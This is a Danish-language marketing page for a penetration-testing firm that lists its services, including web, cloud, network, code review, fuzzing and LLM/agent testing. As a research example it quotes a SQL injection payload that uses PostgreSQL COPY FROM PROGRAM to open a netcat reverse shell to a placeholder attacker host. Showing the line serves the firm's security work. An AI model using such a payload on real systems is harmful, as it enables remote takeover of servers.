Baldur Security er en dansk, research-drevet virksomhed, der laver offensiv sikkerhed og penetrationstest. Vi har ansvarligt offentliggjort sårbarheder, der har ført til CVE’er i software, som millioner bruger, heriblandt Chrome, Fortinet, Mitel, PRTG, Nagios og WithSecure. Vi tester jeres systemer på samme måde.
Det er det samme arbejde, vi udfører på jeres systemer, ikke en scannerrapport med nyt logo. Uddrag fra vores research; hele listen finder I på research-siden.
# Ét <img>-tag blev til en GET-baseret SQL injection, der gav remote code execution GET /api/v1/malware/threats?query=a');COPY pwn FROM PROGRAM 'rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc ATTACKER 8959 >/tmp/a';--
FROM PROGRAM forvandlede en gemt avatar til en reverse shell. Hele kæden →Hvert engagement slutter med bevis, I kan handle på, og dokumentation, I kan give revisorer, kunder og bestyrelsen.
Ét team. Er det, I skal have testet, ikke på listen, så spørg, de interessante mål passer sjældent i en kategori.
Manuel test og kildekodegennemgang. Vi forstår applikationen i dybden og den forretningsrisiko, der følger med.
Læs mere → 02Vi starter som en kompromitteret medarbejder på jeres interne netværk og viser, hvor langt en dygtig angriber når, og hvad der stopper vedkommende.
Læs mere → 03AWS, Azure og GCP: identitet, fejlkonfiguration og privilege escalation, testet som angribere reelt bevæger sig, ikke en tjekliste-scanning.
Læs mere → 04Linje-for-linje gennemgang på tværs af de fleste stacks. Kildekodeadgang finder de logik- og adgangskontrolfejl, scannere overser.
Læs mere → 05Sikkerhed bygget ind i jeres CI/CD: SAST, DAST, dependency- og IaC-scanning, og pipelines jeres udviklere faktisk bliver ved med at bruge.
Læs mere → 06Coverage-guided fuzzing og manuel reversing af binære programmer og firmware.
Læs mere → 07Ekstern og intern netværkstest: eksponerede tjenester, manglende patches og lateral bevægelse, udnyttet og verificeret.
Læs mere → 08Vi tester de LLM'er og agenter, I sætter i produktion, og den AI, I bruger i jeres pipeline: prompt injection med reel effekt, sandbox-escapes og datalækage.
Læs mere →12+ års erfaring på tværs af sektorer som bank, sundhed og det offentlige, for organisationer fra 10 til 10.000 medarbejdere. Vi vægter praktisk erfaring højest og har certificeringerne til at bakke det op.
Et opkald på 30 minutter er nok til at scope de fleste opgaver. Ingen salgstale, kun resultater. I taler med dem, der udfører testen.
Book et scoping-opkald